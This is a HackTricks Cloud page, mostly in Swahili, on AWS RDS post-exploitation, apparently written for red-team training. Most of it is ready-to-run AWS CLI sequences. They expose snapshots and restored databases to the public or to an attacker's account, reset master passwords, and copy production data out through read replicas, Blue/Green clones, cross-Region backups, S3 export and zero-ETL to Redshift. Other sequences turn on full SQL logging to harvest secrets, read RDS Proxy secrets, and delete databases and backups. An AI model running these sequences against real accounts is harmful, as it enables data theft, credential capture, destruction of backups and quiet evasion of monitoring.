AWS - RDS Post Exploitation
Reading time: 23 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na š¬ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter š¦ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
RDS
Kwa taarifa zaidi angalia:
AWS - Relational Database (RDS) Enum
rds:CreateDBSnapshot, rds:RestoreDBInstanceFromDBSnapshot, rds:ModifyDBInstance
Iwapo mshambuliaji ana ruhusa za kutosha, anaweza kufanya DB inayopatikana kwa umma kwa kuunda snapshot ya DB, na kisha DB inayopatikana kwa umma kutoka kwa snapshot.
aws rds describe-db-instances # Get DB identifier
aws rds create-db-snapshot \
--db-instance-identifier <db-id> \
--db-snapshot-identifier cloudgoat
# Get subnet groups & security groups
aws rds describe-db-subnet-groups
aws ec2 describe-security-groups
aws rds restore-db-instance-from-db-snapshot \
--db-instance-identifier "new-db-not-malicious" \
--db-snapshot-identifier <scapshotId> \
--db-subnet-group-name <db subnet group> \
--publicly-accessible \
--vpc-security-group-ids <ec2-security group>
aws rds modify-db-instance \
--db-instance-identifier "new-db-not-malicious" \
--master-user-password 'Llaody2f6.123' \
--apply-immediately
# Connect to the new DB after a few mins
rds:StopDBCluster & rds:StopDBInstance
Mshambuliaji mwenye rds:StopDBCluster au rds:StopDBInstance anaweza kulazimisha kusimamishwa mara moja kwa RDS instance au cluster nzima, kusababisha database kutopatikana, muunganisho kuvunjika, na kusitishwa kwa michakato inayotegemea database.
Ili kusimamisha DB instance moja (mfano):
aws rds stop-db-instance \
--db-instance-identifier <DB_INSTANCE_IDENTIFIER>
Kusimamisha klasta nzima ya DB (mfano):
aws rds stop-db-cluster \
--db-cluster-identifier <DB_CLUSTER_IDENTIFIER>
rds:Delete*
Mshambulizi aliyepewa rds:Delete* anaweza kuondoa rasilimali za RDS, ikiwa ni pamoja na kufuta DB instances, clusters, snapshots, automated backups, subnet groups, parameter/option groups na artifacts zinazohusiana, na kusababisha kukatika kwa huduma mara moja, kupoteza data, uharibifu wa pointi za urejeshaji na kupotea kwa ushahidi wa forensiki.
# Delete a DB instance (creates a final snapshot unless you skip it)
aws rds delete-db-instance \
--db-instance-identifier <DB_INSTANCE_ID> \
--final-db-snapshot-identifier <FINAL_SNAPSHOT_ID> # omit or replace with --skip-final-snapshot to avoid snapshot
# Delete a DB instance and skip final snapshot (more destructive)
aws rds delete-db-instance \
--db-instance-identifier <DB_INSTANCE_ID> \
--skip-final-snapshot
# Delete a manual DB snapshot
aws rds delete-db-snapshot \
--db-snapshot-identifier <DB_SNAPSHOT_ID>
# Delete an Aurora DB cluster (creates a final snapshot unless you skip)
aws rds delete-db-cluster \
--db-cluster-identifier <DB_CLUSTER_ID> \
--final-db-snapshot-identifier <FINAL_CLUSTER_SNAPSHOT_ID> # or use --skip-final-snapshot
rds:ModifyDBSnapshotAttribute, rds:CreateDBSnapshot
Mshambuliaji mwenye ruhusa hizi anaweza kuunda snapshot ya DB na kuifanya kwa umma kupatikana. Kisha, anaweza kuunda DB katika akaunti yake mwenyewe kutoka kwa snapshot hiyo.
Ikiwa mshambuliaji hana rds:CreateDBSnapshot, bado anaweza kufanya snapshot zilizotengenezwa nyingine kwa umma.
# create snapshot
aws rds create-db-snapshot --db-instance-identifier <db-instance-identifier> --db-snapshot-identifier <snapshot-name>
# Make it public/share with attackers account
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
rds:DownloadDBLogFilePortion
Mshambuliaji aliye na ruhusa ya rds:DownloadDBLogFilePortion anaweza download sehemu za log files za instance ya RDS. Ikiwa data nyeti au access credentials zimeandikwa kwa bahati mbaya kwenye log files, mshambuliaji anaweza kutumia taarifa hizi kupandisha ngazi ya ruhusa zao au kufanya vitendo visivyoidhinishwa.
aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text
Athari Zinazowezekana: Kufikia taarifa nyeti au vitendo visivyoidhinishwa kwa kutumia leaked credentials.
rds:DeleteDBInstance
Mshambuliaji akiwa na ruhusa hizi anaweza kufanya DoS kwa RDS instances zilizopo.
# Delete
aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot
Athari inayoweza kutokea: Ufutaji wa instances za RDS zilizopo, na uwezekano wa kupoteza data.
rds:StartExportTask
note
TODO: Kujaribu
Mshambuliaji mwenye ruhusa hii anaweza kuhamisha snapshot ya instance ya RDS kwenye S3 bucket. Ikiwa mshambuliaji anadhibiti S3 bucket ya lengo, anaweza kupata data nyeti ndani ya snapshot iliyohamishwa.
aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id
Athari inayowezekana: Upatikanaji wa data nyeti katika snapshot iliyotolewa.
Kuiga Automated Backups kati ya Region kwa kurejesha kwa siri (rds:StartDBInstanceAutomatedBackupsReplication)
Tumia vibaya kuiga automated backups kati ya Region ili kwa ukimya kunakili automated backups za instance ya RDS kwenda AWS Region nyingine na kuzirejesha huko. Mshambuliaji anaweza kisha kufanya DB iliyorejeshwa ifikike kwa umma na kuweka upya nenosiri kuu ili kufikia data out-of-band katika Region ambayo walinzi hawafuati.
Ruhusa zinazohitajika (minimamu):
rds:StartDBInstanceAutomatedBackupsReplicationin the destination Regionrds:DescribeDBInstanceAutomatedBackupsin the destination Regionrds:RestoreDBInstanceToPointInTimein the destination Regionrds:ModifyDBInstancein the destination Regionrds:StopDBInstanceAutomatedBackupsReplication(optional cleanup)ec2:CreateSecurityGroup,ec2:AuthorizeSecurityGroupIngress(to expose the restored DB)
Athari: Uendelevu na uhamisho wa data kwa kurejesha nakala ya data ya uzalishaji katika Region nyingine na kuifungua kwa umma kwa kutumia vitambulisho vinavyodhibitiwa na mshambuliaji.
CLI kutoka mwanzo hadi mwisho (badilisha vigezo)
# 1) Recon (SOURCE region A)
aws rds describe-db-instances \
--region <SOURCE_REGION> \
--query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,DBInstanceStatus,PreferredBackupWindow]' \
--output table
# 2) Start cross-Region automated backups replication (run in DEST region B)
aws rds start-db-instance-automated-backups-replication \
--region <DEST_REGION> \
--source-db-instance-arn <SOURCE_DB_INSTANCE_ARN> \
--source-region <SOURCE_REGION> \
--backup-retention-period 7
# 3) Wait for replication to be ready in DEST
aws rds describe-db-instance-automated-backups \
--region <DEST_REGION> \
--query 'DBInstanceAutomatedBackups[*].[DBInstanceAutomatedBackupsArn,DBInstanceIdentifier,Status]' \
--output table
# Proceed when Status is "replicating" or "active" and note the DBInstanceAutomatedBackupsArn
# 4) Restore to latest restorable time in DEST
aws rds restore-db-instance-to-point-in-time \
--region <DEST_REGION> \
--source-db-instance-automated-backups-arn <AUTO_BACKUP_ARN> \
--target-db-instance-identifier <TARGET_DB_ID> \
--use-latest-restorable-time \
--db-instance-class db.t3.micro
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>
# 5) Make public and reset credentials in DEST
# 5a) Create/choose an open SG permitting TCP/3306 (adjust engine/port as needed)
OPEN_SG_ID=$(aws ec2 create-security-group --region <DEST_REGION> \
--group-name open-rds-<RAND> --description open --vpc-id <DEST_VPC_ID> \
--query GroupId --output text)
aws ec2 authorize-security-group-ingress --region <DEST_REGION> \
--group-id "$OPEN_SG_ID" \
--ip-permissions IpProtocol=tcp,FromPort=3306,ToPort=3306,IpRanges='[{CidrIp=0.0.0.0/0}]'
# 5b) Publicly expose restored DB and attach the SG
aws rds modify-db-instance --region <DEST_REGION> \
--db-instance-identifier <TARGET_DB_ID> \
--publicly-accessible \
--vpc-security-group-ids "$OPEN_SG_ID" \
--apply-immediately
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>
# 5c) Reset the master password
aws rds modify-db-instance --region <DEST_REGION> \
--db-instance-identifier <TARGET_DB_ID> \
--master-user-password '<NEW_STRONG_PASSWORD>' \
--apply-immediately
aws rds wait db-instance-available --region <DEST_REGION> --db-instance-identifier <TARGET_DB_ID>
# 6) Connect to <TARGET_DB_ID> endpoint and validate data (example for MySQL)
ENDPOINT=$(aws rds describe-db-instances --region <DEST_REGION> \
--db-instance-identifier <TARGET_DB_ID> \
--query 'DBInstances[0].Endpoint.Address' --output text)
mysql -h "$ENDPOINT" -u <MASTER_USERNAME> -p'<NEW_STRONG_PASSWORD>' -e 'SHOW DATABASES;'
# 7) Optional: stop replication
aws rds stop-db-instance-automated-backups-replication \
--region <DEST_REGION> \
--source-db-instance-arn <SOURCE_DB_INSTANCE_ARN>
Washa logging kamili ya SQL kupitia DB parameter groups na exfiltrate kupitia RDS log APIs
Abuse rds:ModifyDBParameterGroup pamoja na RDS log download APIs ili kushika taarifa zote za SQL zinazotekelezwa na applications (hakuna DB engine credentials zinazohitajika). Washa engine SQL logging na pakua file logs kupitia rds:DescribeDBLogFiles na rds:DownloadDBLogFilePortion (au REST downloadCompleteLogFile). Inafaa kukusanya queries ambazo zinaweza kuwa na secrets/PII/JWTs.
Permissions needed (minimum):
rds:DescribeDBInstances,rds:DescribeDBLogFiles,rds:DownloadDBLogFilePortionrds:CreateDBParameterGroup,rds:ModifyDBParameterGrouprds:ModifyDBInstance(only to attach a custom parameter group if the instance is using the default one)rds:RebootDBInstance(for parameters requiring reboot, e.g., PostgreSQL)
Steps
- Recon target and current parameter group
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBParameterGroups[0].DBParameterGroupName]' \
--output table
- Hakikisha custom DB parameter group imeambatishwa (huwezi kuhariri default)
- Ikiwa instance tayari inatumia custom group, tumia tena jina lake katika hatua inayofuata.
- Vinginevyo, unda na uambatisha moja inayolingana na engine family:
# Example for PostgreSQL 16
aws rds create-db-parameter-group \
--db-parameter-group-name ht-logs-pg \
--db-parameter-group-family postgres16 \
--description "HT logging"
aws rds modify-db-instance \
--db-instance-identifier <DB> \
--db-parameter-group-name ht-logs-pg \
--apply-immediately
# Wait until status becomes "available"
- Washa ufuatiliaji wa SQL wa kina
- MySQL engines (mara moja / hakuna kuanzisha upya):
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=general_log,ParameterValue=1,ApplyMethod=immediate" \
"ParameterName=log_output,ParameterValue=FILE,ApplyMethod=immediate"
# Optional extras:
# "ParameterName=slow_query_log,ParameterValue=1,ApplyMethod=immediate" \
# "ParameterName=long_query_time,ParameterValue=0,ApplyMethod=immediate"
- PostgreSQL engines (inahitaji reboot):
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=log_statement,ParameterValue=all,ApplyMethod=pending-reboot"
# Optional to log duration for every statement:
# "ParameterName=log_min_duration_statement,ParameterValue=0,ApplyMethod=pending-reboot"
# Reboot if any parameter is pending-reboot
aws rds reboot-db-instance --db-instance-identifier <DB>
- Acha workload ifanye kazi (au generate queries). Statements zitaandikwa kwenye engine file logs
- MySQL:
general/mysql-general.log - PostgreSQL:
postgresql.log
- Gundua na pakua logs (no DB creds required)
aws rds describe-db-log-files --db-instance-identifier <DB>
# Pull full file via portions (iterate until AdditionalDataPending=false). For small logs a single call is enough:
aws rds download-db-log-file-portion \
--db-instance-identifier <DB> \
--log-file-name general/mysql-general.log \
--starting-token 0 \
--output text > dump.log
- Chunguza nje ya mtandao kutafuta data nyeti
grep -Ei "password=|aws_access_key_id|secret|authorization:|bearer" dump.log | sed 's/\(aws_access_key_id=\)[A-Z0-9]*/\1AKIA.../; s/\(secret=\).*/\1REDACTED/; s/\(Bearer \).*/\1REDACTED/' | head
Mfano wa ushahidi (imehaririwa):
2025-10-06T..Z 13 Query INSERT INTO t(note) VALUES ('user=alice password=Sup3rS3cret!')
2025-10-06T..Z 13 Query INSERT INTO t(note) VALUES ('authorization: Bearer REDACTED')
2025-10-06T..Z 13 Query INSERT INTO t(note) VALUES ('aws_access_key_id=AKIA... secret=REDACTED')
Usafishaji
- Rudisha vigezo kwenye chaguo-msingi na anzisha upya ikiwa inahitajika:
# MySQL
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=general_log,ParameterValue=0,ApplyMethod=immediate"
# PostgreSQL
aws rds modify-db-parameter-group \
--db-parameter-group-name <PGNAME> \
--parameters \
"ParameterName=log_statement,ParameterValue=none,ApplyMethod=pending-reboot"
# Reboot if pending-reboot
Athari: Post-exploitation data access kwa kukamata taarifa zote za SQL za application kupitia AWS APIs (no DB creds), potentially leaking secrets, JWTs, and PII.
rds:CreateDBInstanceReadReplica, rds:ModifyDBInstance
Abuse RDS read replicas ili kupata out-of-band read access bila kugusa primary instance credentials. Mshambuliaji anaweza kuunda read replica kutoka kwa production instance, reset the replica's master password (hii haitabadilisha primary), na kwa hiari expose replica hadharani ili exfiltrate data.
Ruhusa zinazohitajika (chini kabisa):
rds:DescribeDBInstancesrds:CreateDBInstanceReadReplicards:ModifyDBInstanceec2:CreateSecurityGroup,ec2:AuthorizeSecurityGroupIngress(if exposing publicly)
Athari: Ufikiaji wa kusoma-tu kwa production data kupitia replica yenye credentials zinazodhibitiwa na mshambuliaji; uwezekano mdogo wa kugunduliwa kwani primary hubaki bila kuguswa na replication inaendelea.
# 1) Recon: find non-Aurora sources with backups enabled
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,Engine,DBInstanceArn,DBSubnetGroup.DBSubnetGroupName,VpcSecurityGroups[0].VpcSecurityGroupId,PubliclyAccessible]' \
--output table
# 2) Create a permissive SG (replace <VPC_ID> and <YOUR_IP/32>)
aws ec2 create-security-group --group-name rds-repl-exfil --description 'RDS replica exfil' --vpc-id <VPC_ID> --query GroupId --output text
aws ec2 authorize-security-group-ingress --group-id <SGID> --ip-permissions '[{"IpProtocol":"tcp","FromPort":3306,"ToPort":3306,"IpRanges":[{"CidrIp":"<YOUR_IP/32>","Description":"tester"}]}]'
# 3) Create the read replica (optionally public)
aws rds create-db-instance-read-replica \
--db-instance-identifier <REPL_ID> \
--source-db-instance-identifier <SOURCE_DB> \
--db-instance-class db.t3.medium \
--publicly-accessible \
--vpc-security-group-ids <SGID>
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>
# 4) Reset ONLY the replica master password (primary unchanged)
aws rds modify-db-instance --db-instance-identifier <REPL_ID> --master-user-password 'NewStr0ng!Passw0rd' --apply-immediately
aws rds wait db-instance-available --db-instance-identifier <REPL_ID>
# 5) Connect and dump (use the SOURCE master username + NEW password)
REPL_ENDPOINT=$(aws rds describe-db-instances --db-instance-identifier <REPL_ID> --query 'DBInstances[0].Endpoint.Address' --output text)
# e.g., with mysql client: mysql -h "$REPL_ENDPOINT" -u <MASTER_USERNAME> -p'NewStr0ng!Passw0rd' -e 'SHOW DATABASES; SELECT @@read_only, CURRENT_USER();'
# Optional: promote for persistence
# aws rds promote-read-replica --db-instance-identifier <REPL_ID>
Mfano wa ushahidi (MySQL):
- Hali ya Replica DB:
available, read replication:replicating - Muunganisho uliofanikiwa kwa nenosiri jipya na
@@read_only=1ukithibitisha ufikiaji wa replica wa kusoma-tu.
rds:CreateBlueGreenDeployment, rds:ModifyDBInstance
Tumia vibaya RDS Blue/Green kunakili DB ya production kwenye mazingira ya green yanayoendelea ku-replicate na ambayo ni read-only. Kisha weka upya credentials za master za green ili kupata data bila kugusa instance ya blue (prod). Hii ni mbinu ya siri zaidi kuliko snapshot sharing na mara nyingi hupitia monitoring inayolenga chanzo pekee.
# 1) Recon ā find eligible source (nonāAurora MySQL/PostgreSQL in the same account)
aws rds describe-db-instances \
--query 'DBInstances[*].[DBInstanceIdentifier,DBInstanceArn,Engine,EngineVersion,DBSubnetGroup.DBSubnetGroupName,PubliclyAccessible]'
# Ensure: automated backups enabled on source (BackupRetentionPeriod > 0), no RDS Proxy, supported engine/version
# 2) Create Blue/Green deployment (replicates blue->green continuously)
aws rds create-blue-green-deployment \
--blue-green-deployment-name ht-bgd-attack \
--source <BLUE_DB_ARN> \
# Optional to upgrade: --target-engine-version <same-or-higher-compatible>
# Wait until deployment Status becomes AVAILABLE, then note the green DB id
aws rds describe-blue-green-deployments \
--blue-green-deployment-identifier <BGD_ID> \
--query 'BlueGreenDeployments[0].SwitchoverDetails[0].TargetMember'
# Typical green id: <blue>-green-XXXX
# 3) Reset the green master password (does not affect blue)
aws rds modify-db-instance \
--db-instance-identifier <GREEN_DB_ID> \
--master-user-password 'Gr33n!Exfil#1' \
--apply-immediately
# Optional: expose the green for direct access (attach an SG that allows the DB port)
aws rds modify-db-instance \
--db-instance-identifier <GREEN_DB_ID> \
--publicly-accessible \
--vpc-security-group-ids <SG_ALLOWING_DB_PORT> \
--apply-immediately
# 4) Connect to the green endpoint and query/exfiltrate (green is readāonly)
aws rds describe-db-instances \
--db-instance-identifier <GREEN_DB_ID> \
--query 'DBInstances[0].Endpoint.Address' --output text
# Then connect with the master username and the new password and run SELECT/dumps
# e.g. MySQL: mysql -h <endpoint> -u <master_user> -p'Gr33n!Exfil#1'
# 5) Cleanup ā remove blue/green and the green resources
aws rds delete-blue-green-deployment \
--blue-green-deployment-identifier <BGD_ID> \
--delete-target true
Athari: Kusoma-tu lakini ufikiaji kamili wa data kwa clone ya karibu-wakati-kwenye-kweli ya production bila kubadilisha instance ya production. Inafaa kwa uchimbaji wa data kwa siri na uchambuzi wa offline.
SQL nje ya njia ya kawaida kupitia RDS Data API kwa kuwezesha HTTP endpoint + kuweka upya nenosiri mkuu
Tumia vibaya Aurora ili kuwezesha RDS Data API HTTP endpoint kwenye cluster lengwa, uweke upya nenosiri mkuu kwa thamani unayodhibiti, na uendeshe SQL kupitia HTTPS (hapana njia ya mtandao ya VPC inahitajika). Inafanya kazi kwenye engines za Aurora ambazo zinaunga mkono Data API/EnableHttpEndpoint (mfano, Aurora MySQL 8.0 provisioned; baadhi ya matoleo ya Aurora PostgreSQL/MySQL).
Ruhusa (za chini kabisa):
- rds:DescribeDBClusters, rds:ModifyDBCluster (or rds:EnableHttpEndpoint)
- secretsmanager:CreateSecret
- rds-data:ExecuteStatement (and rds-data:BatchExecuteStatement if used)
Athari: Kupita segmentation ya mtandao na kutorosha data kupitia AWS APIs bila muunganisho wa moja kwa moja wa VPC kwa DB.
CLI kutoka mwanzo hadi mwisho (mfano wa Aurora MySQL)
# 1) Identify target cluster ARN
REGION=us-east-1
CLUSTER_ID=<target-cluster-id>
CLUSTER_ARN=$(aws rds describe-db-clusters --region $REGION \
--db-cluster-identifier $CLUSTER_ID \
--query 'DBClusters[0].DBClusterArn' --output text)
# 2) Enable Data API HTTP endpoint on the cluster
# Either of the following (depending on API/engine support):
aws rds enable-http-endpoint --region $REGION --resource-arn "$CLUSTER_ARN"
# or
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--enable-http-endpoint --apply-immediately
# Wait until HttpEndpointEnabled is True
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID \
--query 'DBClusters[0].HttpEndpointEnabled' --output text
# 3) Reset master password to attacker-controlled value
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--master-user-password 'Sup3rStr0ng!1' --apply-immediately
# Wait until pending password change is applied
while :; do
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
P=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID \
--query 'DBClusters[0].PendingModifiedValues.MasterUserPassword' --output text)
[[ "$P" == "None" || "$P" == "null" ]] && break
sleep 10
done
# 4) Create a Secrets Manager secret for Data API auth
SECRET_ARN=$(aws secretsmanager create-secret --region $REGION --name rdsdata/demo-$CLUSTER_ID \
--secret-string '{"username":"admin","password":"Sup3rStr0ng!1"}' \
--query ARN --output text)
# 5) Prove out-of-band SQL via HTTPS using rds-data
# (Example with Aurora MySQL; for PostgreSQL, adjust SQL and username accordingly)
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
--secret-arn "$SECRET_ARN" --database mysql --sql "create database if not exists demo;"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
--secret-arn "$SECRET_ARN" --database demo --sql "create table if not exists pii(note text);"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
--secret-arn "$SECRET_ARN" --database demo --sql "insert into pii(note) values ('token=SECRET_JWT');"
aws rds-data execute-statement --region $REGION --resource-arn "$CLUSTER_ARN" \
--secret-arn "$SECRET_ARN" --database demo --sql "select current_user(), now(), (select count(*) from pii) as row_count;" \
--format-records-as JSON
Vidokezo:
- Ikiwa SQL zenye sentensi nyingi zinakataliwa na rds-data, tuma execute-statement tofauti kwa kila taarifa.
- Kwa engines ambapo modify-db-cluster --enable-http-endpoint haina athari, tumia rds enable-http-endpoint --resource-arn.
- Hakikisha engine/toleo linaunga mkono Data API; vinginevyo HttpEndpointEnabled itabaki False.
Vuna kredensiali za DB kupitia RDS Proxy auth secrets (rds:DescribeDBProxies + secretsmanager:GetSecretValue)
Tumia vibaya usanidi wa RDS Proxy kugundua Secret ya Secrets Manager inayotumika kwa uthibitishaji wa backend, kisha soma secret hiyo kupata kredensiali za database. Mifumo mingi hutoa ruhusa pana za secretsmanager:GetSecretValue, na kufanya hii kuwa njia ya haraka ya kupata DB creds. Ikiwa secret inatumia CMK, ruhusa za KMS zisizopangwa ipasavyo zinaweza pia kuruhusu kms:Decrypt.
Ruhusa zinazohitajika (za chini kabisa):
rds:DescribeDBProxiessecretsmanager:GetSecretValuekwa SecretArn inayotajwa- Hiari endapo secret inatumia CMK:
kms:Decryptkwa ufunguo huo
Athari: Kufichua mara moja DB username/password iliyosanidiwa kwenye proxy; inaruhusu direct DB access au further lateral movement.
Hatua
# 1) Enumerate proxies and extract the SecretArn used for auth
aws rds describe-db-proxies \
--query DBProxies[*].[DBProxyName,Auth[0].AuthScheme,Auth[0].SecretArn] \
--output table
# 2) Read the secret value (common over-permission)
aws secretsmanager get-secret-value \
--secret-id <SecretArnFromProxy> \
--query SecretString --output text
# Example output: {"username":"admin","password":"S3cr3t!"}
Maabara (ya chini kabisa ili kuiga)
REGION=us-east-1
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SECRET_ARN=$(aws secretsmanager create-secret \
--region $REGION --name rds/proxy/aurora-demo \
--secret-string username:admin \
--query ARN --output text)
aws iam create-role --role-name rds-proxy-secret-role \
--assume-role-policy-document Version:2012-10-17
aws iam attach-role-policy --role-name rds-proxy-secret-role \
--policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws rds create-db-proxy --db-proxy-name p0 --engine-family MYSQL \
--auth [AuthScheme:SECRETS] \
--role-arn arn:aws:iam::$ACCOUNT_ID:role/rds-proxy-secret-role \
--vpc-subnet-ids $(aws ec2 describe-subnets --filters Name=default-for-az,Values=true --query Subnets[].SubnetId --output text)
aws rds wait db-proxy-available --db-proxy-name p0
# Now run the enumeration + secret read from the Steps above
Usafishaji (maabara)
aws rds delete-db-proxy --db-proxy-name p0
aws iam detach-role-policy --role-name rds-proxy-secret-role --policy-arn arn:aws:iam::aws:policy/SecretsManagerReadWrite
aws iam delete-role --role-name rds-proxy-secret-role
aws secretsmanager delete-secret --secret-id rds/proxy/aurora-demo --force-delete-without-recovery
Kimyakimya endelevu exfiltration kupitia Aurora zeroāETL kwa Amazon Redshift (rds:CreateIntegration)
Tumia vibaya Aurora PostgreSQL zeroāETL integration ili kuiga data ya production kwa njia endelevu ndani ya namespace ya Redshift Serverless unayodhibiti. Kwa sera ya rasilimali ya Redshift yenye maruhusa inayomruhusu CreateInboundIntegration/AuthorizeInboundIntegration kwa ARN ya cluster maalum ya Aurora, attacker anaweza kuanzisha nakala ya data karibu kwa wakatiāhalisi bila DB creds, snapshots au network exposure.
Permissions needed (minimum):
rds:CreateIntegration,rds:DescribeIntegrations,rds:DeleteIntegrationredshift:PutResourcePolicy,redshift:DescribeInboundIntegrations,redshift:DescribeIntegrationsredshift-data:ExecuteStatement/GetStatementResult/ListDatabases(to query)rds-data:ExecuteStatement(optional; to seed data if needed)
Tested on: us-east-1, Aurora PostgreSQL 16.4 (Serverless v2), Redshift Serverless.
1) Unda Redshift Serverless namespace + workgroup
REGION=us-east-1
RS_NS_ARN=$(aws redshift-serverless create-namespace --region $REGION --namespace-name ztl-ns \
--admin-username adminuser --admin-user-password 'AdminPwd-1!' \
--query namespace.namespaceArn --output text)
RS_WG_ARN=$(aws redshift-serverless create-workgroup --region $REGION --workgroup-name ztl-wg \
--namespace-name ztl-ns --base-capacity 8 --publicly-accessible \
--query workgroup.workgroupArn --output text)
# Wait until AVAILABLE, then enable case sensitivity (required for PostgreSQL)
aws redshift-serverless update-workgroup --region $REGION --workgroup-name ztl-wg \
--config-parameters parameterKey=enable_case_sensitive_identifier,parameterValue=true
2) Sanidi sera ya rasilimali ya Redshift ili kuruhusu chanzo cha Aurora
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
SRC_ARN=<AURORA_CLUSTER_ARN>
cat > rs-rp.json <<JSON
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AuthorizeInboundByRedshiftService",
"Effect": "Allow",
"Principal": {"Service": "redshift.amazonaws.com"},
"Action": "redshift:AuthorizeInboundIntegration",
"Resource": "$RS_NS_ARN",
"Condition": {"StringEquals": {"aws:SourceArn": "$SRC_ARN"}}
},
{
"Sid": "AllowCreateInboundFromAccount",
"Effect": "Allow",
"Principal": {"AWS": "arn:aws:iam::$ACCOUNT_ID:root"},
"Action": "redshift:CreateInboundIntegration",
"Resource": "$RS_NS_ARN"
}
]
}
JSON
aws redshift put-resource-policy --region $REGION --resource-arn "$RS_NS_ARN" --policy file://rs-rp.json
3) Unda Aurora PostgreSQL cluster (iwezeshe Data API na logical replication)
CLUSTER_ID=aurora-ztl
aws rds create-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--engine aurora-postgresql --engine-version 16.4 \
--master-username postgres --master-user-password 'InitPwd-1!' \
--enable-http-endpoint --no-deletion-protection --backup-retention-period 1
aws rds wait db-cluster-available --region $REGION --db-cluster-identifier $CLUSTER_ID
# Serverless v2 instance
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--serverless-v2-scaling-configuration MinCapacity=0.5,MaxCapacity=1 --apply-immediately
aws rds create-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1 \
--db-instance-class db.serverless --engine aurora-postgresql --db-cluster-identifier $CLUSTER_ID
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
# Cluster parameter group for zeroāETL
aws rds create-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg \
--db-parameter-group-family aurora-postgresql16 --description "APG16 zero-ETL params"
aws rds modify-db-cluster-parameter-group --region $REGION --db-cluster-parameter-group-name apg16-ztl-zerodg --parameters \
ParameterName=rds.logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
ParameterName=aurora.enhanced_logical_replication,ParameterValue=1,ApplyMethod=pending-reboot \
ParameterName=aurora.logical_replication_backup,ParameterValue=0,ApplyMethod=pending-reboot \
ParameterName=aurora.logical_replication_globaldb,ParameterValue=0,ApplyMethod=pending-reboot
aws rds modify-db-cluster --region $REGION --db-cluster-identifier $CLUSTER_ID \
--db-cluster-parameter-group-name apg16-ztl-zerodg --apply-immediately
aws rds reboot-db-instance --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
aws rds wait db-instance-available --region $REGION --db-instance-identifier ${CLUSTER_ID}-instance-1
SRC_ARN=$(aws rds describe-db-clusters --region $REGION --db-cluster-identifier $CLUSTER_ID --query 'DBClusters[0].DBClusterArn' --output text)
4) Unda muunganisho wa zeroāETL kutoka RDS
# Include all tables in the default 'postgres' database
aws rds create-integration --region $REGION --source-arn "$SRC_ARN" \
--target-arn "$RS_NS_ARN" --integration-name ztl-demo \
--data-filter 'include: postgres.*.*'
# Redshift inbound integration should become ACTIVE
aws redshift describe-inbound-integrations --region $REGION --target-arn "$RS_NS_ARN"
5) Kuweka na kuhoji data iliyorudishwa katika Redshift
# Create a Redshift database from the inbound integration (use integration_id from SVV_INTEGRATION)
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
--sql "select integration_id from svv_integration" # take the GUID value
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database dev \
--sql "create database ztl_db from integration '<integration_id>' database postgres"
# List tables replicated
aws redshift-data execute-statement --region $REGION --workgroup-name ztl-wg --database ztl_db \
--sql "select table_schema,table_name from information_schema.tables where table_schema not in ('pg_catalog','information_schema') order by 1,2 limit 20;"
Ushahidi ulioonekana katika jaribio:
- redshift describe-inbound-integrations: Hali ACTIVE kwa Integration arn:...377a462b-...
- SVV_INTEGRATION ilionyesha integration_id 377a462b-c42c-4f08-937b-77fe75d98211 na hali PendingDbConnectState kabla ya uundaji wa DB.
